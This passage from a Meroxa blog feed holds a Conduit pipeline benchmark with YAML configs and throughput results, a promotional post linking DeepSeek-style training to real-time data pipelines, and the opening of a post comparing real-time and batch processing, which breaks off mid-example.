&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; benchmark
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; generator
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;generator
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; file &lt;span class=&quot;token comment&quot;&gt;# take payload from file, to skip generation overhead&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.options.path&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ./payload.txt &lt;span class=&quot;token comment&quot;&gt;# different payload sizes - 25B, 1kB, 10kB&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;sdk.batch.size&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10000&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;# different batch sizes - 1, 10, 100, 1000, 10000&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;sdk.batch.delay&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; 0s &lt;span class=&quot;token comment&quot;&gt;# turn off time based batch collection&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; log
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;log
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;level&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; trace
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We used different scenarios to get a better overall picture of the performance:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We tested different batch sizes (1, 10, 100, 1,000, and 10,000) by changing the &lt;code class=&quot;language-text&quot;&gt;sdk.batch.size&lt;/code&gt; field on the source connector.&lt;/li&gt;
&lt;li&gt;We tested different payload sizes (25B, 1kB, 10kB) by adjusting the &lt;code class=&quot;language-text&quot;&gt;format.options.path&lt;/code&gt; and supplying a file of the corresponding size.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We ran every combination on both the old and the new architecture, for a total of 30 test pipelines (5 batch sizes × 3 payload sizes × 2 architectures). While the pipelines were running, we collected metrics using Prometheus and analyzed them with Grafana. We were specifically interested in the average throughput (messages per second) and the average latency of a message (i.e. how long it takes for a message to flow from the source to the destination).&lt;/p&gt;
&lt;p&gt;The tests were executed using Conduit v0.12.3 on a 2024 MacBook Pro with the M4 Max CPU and 36GB of RAM.&lt;/p&gt;
&lt;h3&gt;Results&lt;/h3&gt;
&lt;p&gt;For a payload size of 25 bytes, the new architecture achieved a peak message rate of 569,000 messages per second with a throughput of 13.6 MB/s at a batch size of 10,000. In comparison, the old architecture could only process up to 117,000 messages per second, achieving a throughput of 2.8 MB/s under similar conditions. Latency in the new architecture remained under 1 millisecond for smaller batch sizes and scaled efficiently, reaching 10-25 milliseconds even with a batch size of 10,000. That&apos;s half the latency we observed in the old architecture.&lt;/p&gt;
&lt;p&gt;Note that we are measuring the throughput based on the raw payload size in the source. Every record has metadata attached, like when it was read, the source connector ID, the source connector plugin name and version, etc. Because the payload size is only 25 bytes, the metadata is much larger than the payload in this scenario. So even though the throughput in terms of MB/s might seem low, keep in mind that the actual message size is much larger, and Conduit is pushing more than half a million records per second through the pipeline.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/graph-25b.png&quot; alt=&quot;graph-25b.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Testing a more realistic scenario with 1 KB payloads, the new architecture reached a peak throughput of 267.6 MB/s, corresponding to 274,000 messages per second with a batch size of 1,000. This marks a substantial improvement over the old architecture, which peaked at 98,000 messages per second and 95.7 MB/s. Latency remained under 1 millisecond for smaller batch sizes and scaled gracefully to 25-50 milliseconds for larger batches.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/graph-1k.png&quot; alt=&quot;graph-1k.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;With 10 KB messages, the new architecture delivered a throughput of up to 507.8 MB/s, representing a significant increase from the old architecture&apos;s peak throughput of 380.9 MB/s. The message rate in the new architecture rose to 52,000 messages per second at the highest batch size tested, compared to 39,000 messages per second in the old architecture. Curiously, the old architecture achieved a better throughput in the case of no batching (batch size of 1), although the difference was negligible and more than offset by higher throughput once batching was enabled.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/graph-10k.png&quot; alt=&quot;graph-10k.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Overall, the new architecture outperformed the old one in almost all tested scenarios, particularly excelling in high-throughput and low-latency applications. These improvements demonstrate the effectiveness of the architectural changes in enhancing performance across varying message sizes and batch configurations.&lt;/p&gt;
&lt;h2&gt;Conclusion: The Future of Conduit&lt;/h2&gt;
&lt;p&gt;The results of our evaluation highlight the substantial performance gains achieved by the new architecture. We are pleased with our decision to simplify and improve Conduit&apos;s internals, which increased throughput by over 5x in certain scenarios while further reducing end-to-end latency. These changes allow Conduit to address even more demanding real-world scenarios.&lt;/p&gt;
&lt;p&gt;The rollout of the new architecture is controlled via a feature flag which should ensure a smooth transition while allowing early adopters to test its capabilities in their own environments. We encourage you to experiment with this new architecture and provide feedback:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ conduit run --preview.pipeline-arch-v2&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;One exciting area for future exploration is the possibility of parallelizing workers by loosening ordering guarantees, such as partitioning the record stream and processing it with multiple workers. This approach could further increase the throughput for workloads that don&apos;t demand such guarantees. Open a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub&lt;/a&gt; discussion or join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; and let us know if this is something you would like to see next! Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Unlock DeepSeek-Level Efficiency: Supercharge Your LLMs with Meroxa]]></title><description><![CDATA[This blog explores DeepSeek's hybrid training methodology, combining Supervised Learning and Reinforcement Learning, and emphasizes the critical role of real-time data orchestration for efficient LLM training. 
By showcasing how Meroxa’s platform enables dynamic data ingestion, seamless feedback loops, and scalable feature engineering, the blog provides actionable insights for professionals designing high-performance, real-time AI systems.]]></description><link>https://meroxa.com/blog/unlock-deepseek-level-efficiency-supercharge-your-llms-with-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/unlock-deepseek-level-efficiency-supercharge-your-llms-with-meroxa</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Tue, 28 Jan 2025 10:13:00 GMT</pubDate><content:encoded>&lt;p&gt;The recent &lt;strong&gt;DeepSeek&lt;/strong&gt; announcement has demonstrated a powerful hybrid training approach that combines &lt;strong&gt;supervised learning (SL)&lt;/strong&gt; and &lt;strong&gt;reinforcement learning (RL)&lt;/strong&gt; to achieve ChatGPT-like performance with significantly fewer computational resources. At the heart of its success is an efficient multi-stage training pipeline that transitions from SL to RL while leveraging high-quality feedback loops.&lt;/p&gt;
&lt;p&gt;At &lt;strong&gt;Meroxa&lt;/strong&gt;, we believe that real-time data orchestration is critical to unlocking this level of efficiency for companies building their own LLMs. In this post, we’ll dive deeper into how &lt;strong&gt;DeepSeek works&lt;/strong&gt;, how &lt;strong&gt;real-time data pipelines&lt;/strong&gt; play a crucial role, and how &lt;strong&gt;Meroxa integrates into LLM training architectures&lt;/strong&gt; to replicate and surpass these results.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;How DeepSeek Works&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;DeepSeek achieves its performance through an efficient hybrid training process that combines &lt;strong&gt;Supervised Learning (SL)&lt;/strong&gt; and &lt;strong&gt;Reinforcement Learning (RL)&lt;/strong&gt;. This multi-stage approach reduces the need for extensive datasets and computational resources while optimizing model performance.&lt;/p&gt;
&lt;p&gt;Here’s how it works:
&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-28-100257.png&quot; alt=&quot;mermaid-diagram-2025-01-28-100257.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Detailed Stages of DeepSeek&lt;/strong&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Initial Data Collection&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Gather labeled data from domain experts or curated datasets. This data forms the foundation for supervised learning.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Supervised Learning Pretraining&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Train a base model using the collected labeled data. This step creates a &quot;cold-start&quot; model with basic capabilities, reducing the need for random exploration in RL.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reinforcement Learning Fine-Tuning&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Transition the pretrained model into an RL framework. The model interacts with dynamic simulations or real-world environments, learning to improve based on reward signals.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dynamic Environment Simulations&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Use simulations that replicate real-world conditions. These environments are continuously updated with new data to ensure training relevance.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reward Signal Generation&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Evaluate the model’s actions and generate reward signals based on predefined success metrics (e.g., accuracy, efficiency, or user satisfaction).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optimized Policy&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Iterate through multiple RL cycles, refining the model’s policy to maximize cumulative rewards.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deployed Model&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Deploy the trained model into production, where it operates based on its learned policy.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Production Feedback&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Collect real-time feedback from the deployed model’s performance. This feedback loop ensures the model continues to adapt to new data or changing conditions.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;How Meroxa Enables DeepSeek-Level Performance&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;DeepSeek’s hybrid training pipeline relies heavily on fresh, high-quality data and efficient feedback loops. Without a robust &lt;strong&gt;real-time data orchestration&lt;/strong&gt; layer, replicating this efficiency is challenging. This is where Meroxa excels.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Key Benefits of Meroxa for DeepSeek-Like Architectures&lt;/strong&gt;:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data Ingestion&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Stream operational metrics, user interactions, and environment simulations into training pipelines.&lt;/li&gt;
&lt;li&gt;Ensure that training data is always up-to-date, reducing redundancy and improving model generalization.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Seamless Feedback Integration&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Enable closed-loop learning by streaming production feedback (e.g., user ratings, success/failure metrics) directly into RL pipelines.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalable Feature Engineering&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Use Meroxa’s platform to preprocess and transform data in real time, ensuring that training pipelines receive high-quality, actionable features.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dynamic Environment Updates&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Keep RL environments dynamic by feeding in live data streams, ensuring simulations stay representative of real-world conditions.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;strong&gt;Updated Workflow&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The following workflow shows how Meroxa integrates into the training pipeline to enable DeepSeek-like performance:
&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-28-100415.png&quot; alt=&quot;mermaid-diagram-2025-01-28-100415.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Detailed Integration: How Meroxa Fits into the Pipeline&lt;/strong&gt;&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;1. Real-Time Data Sources&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa connects to diverse real-time data sources, such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;User interactions&lt;/strong&gt;: Chat logs, clicks, or other behavioral data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operational logs&lt;/strong&gt;: System metrics like latency, throughput, or errors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Production feedback&lt;/strong&gt;: Model evaluation metrics, customer ratings, or outcomes.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;External APIs&lt;/strong&gt;: Third-party data streams (e.g., stock prices, social media trends).&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;2. Meroxa’s Platform&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa acts as the central data orchestration layer:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Connectors&lt;/strong&gt;: Seamlessly ingest data using CDC, streaming APIs, or message queues like Kafka.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Transformation Layer&lt;/strong&gt;: Clean, filter, and preprocess raw data streams.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Feature Engineering&lt;/strong&gt;: Aggregate and create features needed for training (e.g., state-action pairs for RL or reward signals).&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;3. Training Pipeline&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Supervised Learning (SL)&lt;/strong&gt;: Use Meroxa&apos;s preprocessed data to pretrain the LLM.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reinforcement Learning (RL)&lt;/strong&gt;: Stream live data into RL environments to fine-tune the model based on up-to-date conditions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dynamic Simulations&lt;/strong&gt;: Continuously update simulations with real-world data for more accurate environment modeling.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;4. Deployment and Feedback&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Deploy the LLM in production and monitor its performance in real time.&lt;/li&gt;
&lt;li&gt;Stream feedback metrics back to Meroxa for ongoing training and optimization.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Real-Life Applications of DeepSeek-Like Architectures with Real-Time Data&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Real-time data pipelines, enabled by platforms like Meroxa, empower businesses to train and deploy more efficient and performant large language models (LLMs) across various domains. Below, we explore &lt;strong&gt;detailed use cases&lt;/strong&gt; for such architectures and highlight how real-time data integration transforms performance and adaptability.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;1. Conversational AI for Customer Support&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In customer support, chatbots powered by LLMs often face challenges in adapting to evolving customer queries, new product launches, or unexpected issues. Static training datasets quickly become outdated, leading to suboptimal responses and user dissatisfaction. Meroxa addresses this by streaming live chat logs, customer feedback, and conversation outcomes into the training pipeline. Supervised learning is employed initially to provide the chatbot with a strong linguistic foundation, while reinforcement learning refines its ability to resolve complex issues based on real-world feedback.&lt;/p&gt;
&lt;p&gt;Meroxa integrates seamlessly by ingesting live interaction data through CDC connectors, transforming it into actionable features, and feeding these into the LLM’s supervised pretraining and reinforcement learning loops. The chatbot is continuously fine-tuned using data collected from production environments, creating a feedback loop that ensures it evolves alongside user expectations.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-28-100454.png&quot; alt=&quot;mermaid-diagram-2025-01-28-100454.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;This continuous improvement cycle transforms the chatbot into a highly responsive and context-aware virtual assistant, reducing user frustration and improving resolution rates.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;2. Personalized E-Commerce Recommendations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;E-commerce platforms rely on recommendation engines to drive engagement and increase sales. However, static models often fail to account for real-time changes in customer behavior, such as trending products during promotions or seasonal preferences. Meroxa enables continuous real-time data integration by ingesting clickstream data, cart additions, and abandoned cart metrics.&lt;/p&gt;
&lt;p&gt;Using Meroxa’s platform, raw customer data is transformed into actionable features and fed into reinforcement learning pipelines. The recommendation engine continuously refines its suggestions based on live user behavior and feedback loops. This enables the model to adapt dynamically, prioritizing products that align with real-time shopping trends.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-28-100516.png&quot; alt=&quot;mermaid-diagram-2025-01-28-100516.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;3. Fraud Detection for Financial Institutions&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Detecting fraud in financial transactions requires models that can quickly adapt to emerging patterns and techniques used by malicious actors. Static fraud detection systems struggle to identify new anomalies because they rely on historical data that becomes outdated. Meroxa provides a solution by streaming live transactional data, anomaly reports, and confirmed fraud cases into the training pipeline.&lt;/p&gt;
&lt;p&gt;The system uses supervised learning for pretraining, enabling the detection of common fraud patterns. Reinforcement learning further fine-tunes the model by exposing it to real-time transaction simulations, allowing it to learn from both successful detections and missed anomalies. Meroxa’s feedback loop ensures that confirmed fraud cases are reintegrated into the training process, creating a continuously evolving fraud detection system.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-28-100543.png&quot; alt=&quot;mermaid-diagram-2025-01-28-100543.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;This architecture ensures financial institutions are equipped with proactive, adaptive fraud detection systems that minimize losses and maintain trust.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;4. Adaptive Financial Modeling&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In financial modeling, LLMs are frequently used to forecast market trends, predict stock movements, or assess credit risk. However, financial markets are inherently volatile, and models trained on static datasets fail to reflect real-time conditions, leading to inaccurate predictions. Meroxa enables adaptive modeling by streaming live market data, economic indicators, and transactional logs directly into the training pipelines.&lt;/p&gt;
&lt;p&gt;The platform facilitates the preprocessing and transformation of raw financial data into relevant features. The LLM undergoes supervised pretraining to capture long-term patterns and trends. This is followed by reinforcement learning, where the model interacts with dynamic simulations or live environments to adapt to market fluctuations. Feedback from deployed predictions informs further fine-tuning, ensuring the model’s continuous improvement.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-28-100618.png&quot; alt=&quot;mermaid-diagram-2025-01-28-100618.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;This integration allows financial institutions to deploy models that remain accurate and reliable, even in rapidly changing economic environments.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;DeepSeek has shown us that high-performance models don’t require endless resources—they require &lt;strong&gt;efficient pipelines and fresh data&lt;/strong&gt;. With Meroxa, your team can build real-time data workflows that rival or exceed the efficiency of DeepSeek’s approach, enabling your LLMs to deliver superior results at a fraction of the cost.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ready to build smarter, faster pipelines?&lt;/strong&gt; &lt;a href=&quot;https://meroxa.com/&quot;&gt;Contact us&lt;/a&gt; to learn more about how we can help you achieve DeepSeek-level performance. Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time vs. Batch: Why Real-Time Pipelines Are the Future]]></title><description><![CDATA[This blog dives into the critical differences between batch and real-time data pipelines, exploring why businesses are shifting towards real-time solutions to stay competitive. It highlights the limitations of batch processing—such as stale data, inefficiencies, and scalability challenges—while showcasing the benefits of real-time pipelines, including always up-to-date insights, proactive decision-making, and enhanced customer experiences. The blog also demonstrates how Meroxa’s Conduit Platform simplifies real-time data integration with features like in-flight transformations, cloud-native scalability, and real-time observability, making it the ideal tool for modern data workflows. Perfect for developers, data engineers, and business leaders seeking to harness the power of real-time data.]]></description><link>https://meroxa.com/blog/real-time-vs-batch-why-real-time-pipelines-are-the-future</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-vs-batch-why-real-time-pipelines-are-the-future</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Thu, 23 Jan 2025 13:32:00 GMT</pubDate><content:encoded>&lt;h3&gt;What You Need to Know About Real-Time vs. Batch Processing&lt;/h3&gt;
&lt;p&gt;Businesses increasingly need data insights faster than ever before. Whether it’s making real-time recommendations, detecting fraud, or responding to market shifts, speed is key. For decades, batch processing was the standard for managing data workflows. But with the rise of real-time pipelines, the limitations of batch processing have become clear—and businesses are shifting their focus to solutions that can keep up with the pace of modern demands.&lt;/p&gt;
&lt;h3&gt;The Limitations of Batch Processing&lt;/h3&gt;
&lt;p&gt;Batch processing involves collecting, processing, and analyzing data in scheduled intervals—daily, hourly, or even weekly. While it has served many organizations well, its limitations are becoming increasingly problematic:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Stale Data:&lt;/strong&gt; Batch pipelines process data in bulk, which means insights are only as fresh as the last batch. This lag can lead to outdated or irrelevant insights.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operational Inefficiencies:&lt;/strong&gt; Processing large volumes of data simultaneously can result in resource bottlenecks, increasing costs and reducing system efficiency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Limited Responsiveness:&lt;/strong&gt; Batch workflows are ill-suited for use cases requiring immediate action, such as fraud detection or real-time personalization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Complexity at Scale:&lt;/strong&gt; As data grows in volume and velocity, batch systems become harder to scale and maintain, often requiring extensive engineering resources.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;The Power of Real-Time Pipelines&lt;/h3&gt;
&lt;p&gt;Real-time pipelines, by contrast, process data as it is generated. This enables businesses to act on fresh, accurate information and unlock new possibilities for data-driven decision-making. Here’s why real-time is the future:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Always Up-to-Date Insights:&lt;/strong&gt; Real-time pipelines ensure that data is processed and delivered continuously, enabling instant access to the latest information.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved Customer Experiences:&lt;/strong&gt; Applications like recommendation engines, dynamic pricing, and chatbots thrive on real-time data to deliver personalized and timely interactions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Proactive Decision-Making:&lt;/strong&gt; Real-time pipelines empower businesses to detect and respond to anomalies, opportunities, or threats as they happen.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operational Efficiency:&lt;/strong&gt; By processing data incrementally, real-time pipelines reduce the need for resource-intensive batch jobs, leading to better cost control and scalability.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Why Meroxa’s Conduit Platform Leads in Real-Time Data Processing&lt;/h3&gt;
&lt;p&gt;Meroxa’s Conduit Platform is purpose-built to enable real-time data movement and transformation, addressing the limitations of batch processing head-on. Here’s how the Conduit Platform stands out:&lt;/p&gt;
&lt;h3&gt;1. &lt;strong&gt;Seamless Real-Time Integration&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Conduit Platform connects to a wide range of data sources, including databases, APIs, and event streams, ingesting data in real-time. Unlike batch-focused systems, the Conduit Platform ensures minimal latency from data source to destination.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Example:&lt;/strong&gt; While traditional batch tools might update a dashboard once an hour, the Conduit Platform streams data continuously, keeping dashboards current with every new event.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Technical Insight:&lt;/strong&gt; Conduit’s connector library includes Postgres, MongoDB, Kafka, and Snowflake, enabling event-driven architectures with minimal setup and configuration.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;2. &lt;strong&gt;In-Flight Transformations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;With the Conduit Platform, you can enrich, filter, and transform data as it flows through the pipeline. These in-flight transformations ensure that only relevant, clean data reaches its destination.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Comparison:&lt;/strong&gt; Competitors often require scheduling batch ETL jobs, delaying data availability and introducing additional resource overhead.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Configuration File Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; postgres&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;to&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;file
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; postgres&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
